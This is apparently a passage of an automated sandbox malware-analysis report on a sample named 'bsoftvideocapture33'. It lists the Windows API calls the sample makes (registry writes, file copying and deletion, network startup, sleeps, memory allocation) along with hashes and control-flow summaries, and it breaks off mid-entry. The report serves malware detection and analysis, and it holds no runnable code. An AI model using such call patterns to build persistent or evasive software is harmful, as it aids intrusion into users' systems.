                                                                                                                                        • API String ID: 3019604839-3916222277
                                                                                                                                        • Opcode ID: 138cf1d2708028cd6e9096853fa836b610bce6da07ce657d635f6670e06ad364
                                                                                                                                        • Instruction ID: b28a29316e79cb766f5da1f380b87f9e4da6436ce9bd12b8eed34f014587212c
                                                                                                                                        • Opcode Fuzzy Hash: 138cf1d2708028cd6e9096853fa836b610bce6da07ce657d635f6670e06ad364
                                                                                                                                        • Instruction Fuzzy Hash: 28810171D04258DFDF01CFE8D985AEEBBB0FB09315F1400AAE581B7262C3385A85DB69

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32 ref: 00402A46
                                                                                                                                          • Part of subcall function 00403B64: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                                                                          • Part of subcall function 00403B64: HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                                                                        • GetCommandLineA.KERNEL32 ref: 00402A94
                                                                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 00402ABF
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402AE2
                                                                                                                                          • Part of subcall function 00402B3B: ExitProcess.KERNEL32 ref: 00402B58
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2057626494-0
                                                                                                                                        • Opcode ID: 5b516be980998e5fa11934bd411f48f35677f68372fd4b7f5b43ba3d9a21ae17
                                                                                                                                        • Instruction ID: 77a0c2ab577daa94e22818ed769fd4cb67ba6910a5c0d3980e0314dd63f46b93
                                                                                                                                        • Opcode Fuzzy Hash: 5b516be980998e5fa11934bd411f48f35677f68372fd4b7f5b43ba3d9a21ae17
                                                                                                                                        • Instruction Fuzzy Hash: 31214CB19006159EDB14AFA6DE4AA6E7FA9EB04715F10413EF905BB2D1DB384900CA6C

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 740 401835-401838 741 40183a 740->741 742 40189b-40db06 740->742 744 401825-40dcb5 741->744 745 40183c-401cd2 GetLastError 741->745 750 40de16 742->750 754 40dcba 744->754 751 401fdf-401ff5 LoadLibraryExA 745->751 755 40de92 750->755 752 40d7f3-40d831 751->752 753 401ffb-40200d 751->753 752->755 758 40d57b-40d57e 753->758 754->754 756 401f68-401f6d 755->756 757 40de98-40deb8 755->757 756->758 758->750
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32 ref: 00401852
                                                                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00401FE2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastLibraryLoad
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 3568775529-2766056989
                                                                                                                                        • Opcode ID: fa32cd7ee5d60e40f92298de5ee657d72ad152052aaf235de9ac9c55e9c029d1
                                                                                                                                        • Instruction ID: d5516f6041786ed170d3c0c06144c86260fc33ccfab8605abc871f512ee97d29
                                                                                                                                        • Opcode Fuzzy Hash: fa32cd7ee5d60e40f92298de5ee657d72ad152052aaf235de9ac9c55e9c029d1
                                                                                                                                        • Instruction Fuzzy Hash: 9C512271908145CFDB08CFA8EDA17EE7BB0FB06310F14816AE592B72E2D3784945DB59

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 759 2c01aa9-2c01ac3 InterlockedIncrement 760 2c01ac5-2c01ad7 WSAStartup InterlockedExchange 759->760 761 2c01add-2c01ae0 759->761 760->761
                                                                                                                                        APIs
                                                                                                                                        • InterlockedIncrement.KERNEL32(02C3529C), ref: 02C01ABA
                                                                                                                                        • WSAStartup.WS2_32(00000002,00000000), ref: 02C01ACB
                                                                                                                                        • InterlockedExchange.KERNEL32(02C352A0,00000000), ref: 02C01AD7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked$ExchangeIncrementStartup
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1856147945-0
                                                                                                                                        • Opcode ID: c2c6ca63c17d35ed66bebc1b9fb7df9b61b4f1b75e15022956994ea8b5ccaa4d
                                                                                                                                        • Instruction ID: 62970b67e62f34e8503e813d9c7964ca005a618b4f8e9cb1067c6146b39eb51c
                                                                                                                                        • Opcode Fuzzy Hash: c2c6ca63c17d35ed66bebc1b9fb7df9b61b4f1b75e15022956994ea8b5ccaa4d
                                                                                                                                        • Instruction Fuzzy Hash: E7D05E71DA42045BE23066A0AD4FB7A776CE70A752FC10B61FD6AC41C0EE92652885E7

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 762 40d149-40d14b 763 40d18c-40d190 762->763 764 40d14d-40d162 GetStartupInfoA 762->764 766 40d192 763->766 767 40d18a 763->767 764->767 769 40d387 call 401649 766->769 768 40d19e 767->768 768->769 771 40d38c-40dcb5 769->771 773 40dcba 771->773 773->773
                                                                                                                                        APIs
                                                                                                                                        • GetStartupInfoA.KERNEL32(0040BC80), ref: 0040D15C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoStartup
                                                                                                                                        • String ID: Common AppData
                                                                                                                                        • API String ID: 2571198056-2574214464
                                                                                                                                        • Opcode ID: e11149a184dbb0c256238520043bcf4877e83a20bfd6f2021a5085cfc2b6f98c
                                                                                                                                        • Instruction ID: 0bb3258f36f46a5c88c02bf45da4fdb8c915251985bcaa1644ac6c960dcc43ff
                                                                                                                                        • Opcode Fuzzy Hash: e11149a184dbb0c256238520043bcf4877e83a20bfd6f2021a5085cfc2b6f98c
                                                                                                                                        • Instruction Fuzzy Hash: C1F0E571D1D100CFC7086B95DA242B637B1EB58319B35447BD846BF1E1DABC080AA19F

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 786 403b64-403b82 HeapCreate 787 403b84-403b91 call 403a1c 786->787 788 403bba-403bbc 786->788 791 403ba0-403ba3 787->791 792 403b93-403b9e call 403f3b 787->792 794 403ba5 call 40478c 791->794 795 403bbd-403bc0 791->795 798 403baa-403bac 792->798 794->798 798->795 799 403bae-403bb4 HeapDestroy 798->799 799->788
                                                                                                                                        APIs
                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                                                                          • Part of subcall function 00403A1C: GetVersionExA.KERNEL32 ref: 00403A3B
                                                                                                                                        • HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                                                                          • Part of subcall function 00403F3B: HeapAlloc.KERNEL32(00000000,00000140,00403B9D,000003F8), ref: 00403F48
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2507506473-0
                                                                                                                                        • Opcode ID: 0e50683ef5f87bfa7b7a3a131c3d96fe51d1ce1a964ea2283cbc2ce75e6f1d9c
                                                                                                                                        • Instruction ID: 550f2133393d729a37de5e2391f12db29a8156ca4bb40a4077295a364e13fd94
                                                                                                                                        • Opcode Fuzzy Hash: 0e50683ef5f87bfa7b7a3a131c3d96fe51d1ce1a964ea2283cbc2ce75e6f1d9c
                                                                                                                                        • Instruction Fuzzy Hash: A5F030706547019DDB101F319E4572A3AA89B4075BF10447FF900F91D1EFBC9684951D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 774 40192c-40193b 775 401cc4-401ff5 LoadLibraryExA 774->775 776 40184f-401cd2 GetLastError 774->776 779 40d7f3-40d831 775->779 780 401ffb-40200d 775->780 776->775 781 40de92 779->781 782 40d57b-40de16 780->782 783 401f68-401f6d 781->783 784 40de98-40deb8 781->784 782->781 783->782
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32 ref: 00401852
                                                                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00401FE2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastLibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3568775529-0
                                                                                                                                        • Opcode ID: 5d9a8f9b6c94dc2d0ceaccf59ac2092baa1fe039045fc1d470e08c8011668634
                                                                                                                                        • Instruction ID: c79ba1d31e037f46b2450d03273a7c6e7ab4f6ac62d6348a8068dc6ce970176e
                                                                                                                                        • Opcode Fuzzy Hash: 5d9a8f9b6c94dc2d0ceaccf59ac2092baa1fe039045fc1d470e08c8011668634
                                                                                                                                        • Instruction Fuzzy Hash: 28F0E230A19205EFDB09CBA8D994BADB7B2BF05710F55806AE402772E0C7785A46DA15

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 800 2c9c01d-2c9c0bd DeleteFileA
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C38000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C38000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c38000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4033686569-0
                                                                                                                                        • Opcode ID: f9803b8480792056e34924d2a2a8535bac6b1854602d0fb08de7774307fe52e0
                                                                                                                                        • Instruction ID: 9654f8ed02a773b43efc2cc6c6c56eecb654eada563c054437838b9be737d309
                                                                                                                                        • Opcode Fuzzy Hash: f9803b8480792056e34924d2a2a8535bac6b1854602d0fb08de7774307fe52e0
                                                                                                                                        • Instruction Fuzzy Hash: B20192F264C2009BEB053E19EC95779FBE5EF54320F1A492DDBD143340EA3A941586DB

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 801 401802-40180f RegCreateKeyExA 802 401815-40181d 801->802 803 40d1e9 801->803 802->803 805 40dc8d-40dca5 802->805 804 40df34-40df98 803->804 806 40df9d 804->806 805->804 806->806
                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002), ref: 00401807
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                        • Opcode ID: ba6927a38b2257f2ecdb45b97f7b8bff65bd7fc53d11e895a3e2d85cd6031c11
                                                                                                                                        • Instruction ID: d923ecf7cc0b7138f56083e88ccf011a39d065552f2ef49dfddf64746cfb0571
                                                                                                                                        • Opcode Fuzzy Hash: ba6927a38b2257f2ecdb45b97f7b8bff65bd7fc53d11e895a3e2d85cd6031c11
                                                                                                                                        • Instruction Fuzzy Hash: FE0184515091C08AE3065BA9AE616F63FB5D302340F48107ED5D2B72A3C43C490AEB1D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 807 40d1e3 RegCloseKey 808 40d1e9-40df98 807->808 810 40df9d 808->810 810->810
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                        • Opcode ID: 75ff2164dc8a7abc6bd7d7abba8b5f4b8d4660e1931557c14bfd96b563a853a2
                                                                                                                                        • Instruction ID: b15390bd9e37436451516aa96a73ff984f6a966f42a6927e346401dd58fb0ef3
                                                                                                                                        • Opcode Fuzzy Hash: 75ff2164dc8a7abc6bd7d7abba8b5f4b8d4660e1931557c14bfd96b563a853a2
                                                                                                                                        • Instruction Fuzzy Hash: E0F054611155C48BD70A9BA9AE716A63FB5D302340F44407DD682A6263D53C590ADB1D
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C38000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C38000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c38000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: b0dd2d4e352bc6d16d6c2135eec307b7da6df9505f3b5d20b72da8d5659760e1
                                                                                                                                        • Instruction ID: 3c5d743c6bda27cf0c99e94d127ada5c8eba49d8bd9a0de7e0da8f88190a02b6
                                                                                                                                        • Opcode Fuzzy Hash: b0dd2d4e352bc6d16d6c2135eec307b7da6df9505f3b5d20b72da8d5659760e1
                                                                                                                                        • Instruction Fuzzy Hash: ABE0CDB26583049FD3723649FCC97E7F3E4EB44211F0A0529D39143710FA35455486DB
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ManagerOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1889721586-0
                                                                                                                                        • Opcode ID: 4277b380ff83cd63e17ff96104b42d9b898c14e3e5168dfc32be21eedda8092d
                                                                                                                                        • Instruction ID: 2cd0856ba97e3bf412aec3146a5630d14254a56439a6ff2d1ccf095111e7f1ec
                                                                                                                                        • Opcode Fuzzy Hash: 4277b380ff83cd63e17ff96104b42d9b898c14e3e5168dfc32be21eedda8092d
                                                                                                                                        • Instruction Fuzzy Hash: 65D012A0C0C006FDC3900AA01EE883B34AC650138C3719437E507700D0C53C2A4FB62F
                                                                                                                                        APIs
                                                                                                                                        • CreateDirectoryA.KERNELBASE ref: 0040D49F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4241100979-0
                                                                                                                                        • Opcode ID: 7e3730ee33c11ba97f11e3f79a140faf31233aded7765e9d97d7188c65411aed
                                                                                                                                        • Instruction ID: 8f6ef8068710ec2f19211bcf2c23eb8355cc0257c0ec37e96d28887ff5977714
                                                                                                                                        • Opcode Fuzzy Hash: 7e3730ee33c11ba97f11e3f79a140faf31233aded7765e9d97d7188c65411aed
                                                                                                                                        • Instruction Fuzzy Hash: C9C02B70C05810E6D04072E50E0DC2B200C8C4230433000377602300C3887D101A51BF
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CopyFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1304948518-0
                                                                                                                                        • Opcode ID: e5b9a78a2c73aedf332491cfc037e0a70f06f76d3755ce8f5b1b1c42bb36e37d
                                                                                                                                        • Instruction ID: a097fa76df8700e82137b1c95dde5690dc28a33263db371a8e36e70a98bacb54
                                                                                                                                        • Opcode Fuzzy Hash: e5b9a78a2c73aedf332491cfc037e0a70f06f76d3755ce8f5b1b1c42bb36e37d
                                                                                                                                        • Instruction Fuzzy Hash: 9BC08C70448018EAC51083408D0DEE522AC4704300F5100B36703B10D0C63C450B6A3A
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CopyFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1304948518-0
                                                                                                                                        • Opcode ID: ca0f43783d24d3444b9e96b308ceb122488ec2790c8431c4624f44b8c8b2b0a7
                                                                                                                                        • Instruction ID: 02787dda2aad0b73011b835152ae5dd3ca9a5de86f67dfe5cd15f24d3abcc573
                                                                                                                                        • Opcode Fuzzy Hash: ca0f43783d24d3444b9e96b308ceb122488ec2790c8431c4624f44b8c8b2b0a7
                                                                                                                                        • Instruction Fuzzy Hash: 2AB09B74404105EAD51557548E49ED5326C5704B10F1144767745764908578454E5955
                                                                                                                                        APIs
                                                                                                                                        • RegQueryValueExA.KERNELBASE(?), ref: 0040D6C7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                        • Opcode ID: d92cf84875f9c76641183f6f07d9ae92edda5dac98e07587da3feb5db9149b65
                                                                                                                                        • Instruction ID: fb21790fa505c77033109dc37f10370514157f3a52298f6aab93d24c9f505fbd
                                                                                                                                        • Opcode Fuzzy Hash: d92cf84875f9c76641183f6f07d9ae92edda5dac98e07587da3feb5db9149b65
                                                                                                                                        • Instruction Fuzzy Hash: D5B09230D04905DACB015FE0890426DBA70BA44340721483A9862B1160DB764209AE2A
                                                                                                                                        APIs
                                                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 0040DE1E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                        • Opcode ID: 019306f91bb0a516ddcc5506d401865b58acaa02ff4c8b5701eb20f2b7f35127
                                                                                                                                        • Instruction ID: 8df05d5140b126386bcbe442531bfaa431276761bc90c7e2a76cd10d99baf89a
                                                                                                                                        • Opcode Fuzzy Hash: 019306f91bb0a516ddcc5506d401865b58acaa02ff4c8b5701eb20f2b7f35127
                                                                                                                                        • Instruction Fuzzy Hash: 37B01234D48510FBCF111FD0CE04C5E7A315E887103210032B142300E2877D0419B7AF
                                                                                                                                        APIs
                                                                                                                                        • RegSetValueExA.KERNELBASE(?), ref: 0040DD60
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                        • Opcode ID: 1b4ebe2fec5b4a3023f0bad9d63577fc66ec2e33e09b68b8b149b311f5e83236
                                                                                                                                        • Instruction ID: cf0988a8e8a47b3c353c7c301440774cb7cbeba70b5db0076430efe6b1906566
                                                                                                                                        • Opcode Fuzzy Hash: 1b4ebe2fec5b4a3023f0bad9d63577fc66ec2e33e09b68b8b149b311f5e83236
                                                                                                                                        • Instruction Fuzzy Hash: 6BB00235C04418DBCB661B909F046A87A71AB08305F1200A5D296750608B350B69AE5E
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CopyFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1304948518-0
                                                                                                                                        • Opcode ID: 61b88586a1918d7d60107e7eb9ce3ad16c8b06ab40d01054ffd68403e146a7bd
                                                                                                                                        • Instruction ID: 6cb6adae6e4dae387a6a68d861111d6e9fcc768d2f9bb0382d04ed7505f7e105
                                                                                                                                        • Opcode Fuzzy Hash: 61b88586a1918d7d60107e7eb9ce3ad16c8b06ab40d01054ffd68403e146a7bd
                                                                                                                                        • Instruction Fuzzy Hash: 3EA002E4608103FFF6101FA15E58E6A669C591CBD5329483E6947F00A4DA3C804FB53F
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Open
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                        • Opcode ID: 590101ebec6884a0ee9acb2973829ab2a3c525f84439f3422b32393d86e70515
                                                                                                                                        • Instruction ID: fa591de2837cbe488cb39c7422687169b7d8a4828dc75018a60cd497aa2dadd4
                                                                                                                                        • Opcode Fuzzy Hash: 590101ebec6884a0ee9acb2973829ab2a3c525f84439f3422b32393d86e70515
                                                                                                                                        • Instruction Fuzzy Hash: 91900220204101DBE2040A325E0825626546614745B15493D5443E0560DE3580056929
                                                                                                                                        APIs
                                                                                                                                        • GetStartupInfoA.KERNEL32(0040BC80), ref: 0040D15C
                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0040D857
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoSleepStartup
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3346105675-0
                                                                                                                                        • Opcode ID: d8bd0a5b66df7fb4c9f7b7ae2efc96fbb760cedbf004f94a108370c320a30853
                                                                                                                                        • Instruction ID: 2299f81a32afc2227fd4ffadf722fb2cc1aa9bd81cf42cca85cc2c4d5e93fbac
                                                                                                                                        • Opcode Fuzzy Hash: d8bd0a5b66df7fb4c9f7b7ae2efc96fbb760cedbf004f94a108370c320a30853
                                                                                                                                        • Instruction Fuzzy Hash: 7BE08631D40245D7D700BBE8CA187D837B06B06721F50423AD553755E8D3785D4AD64E
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 004018BA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                        • Opcode ID: 4e41d93dbac67fc513ae985163373413cb6066643fc0cc81b691efc704c9910c
                                                                                                                                        • Instruction ID: 220e77d57c282ac6125877b4d35a95527c6c8f9821d507532ec90b47c11e1897
                                                                                                                                        • Opcode Fuzzy Hash: 4e41d93dbac67fc513ae985163373413cb6066643fc0cc81b691efc704c9910c
                                                                                                                                        • Instruction Fuzzy Hash: D2C01230988500EBEB490B81CE04F2CBA30EB44300F210021F102790E08B389A05AA0A
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000), ref: 0040DCDA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
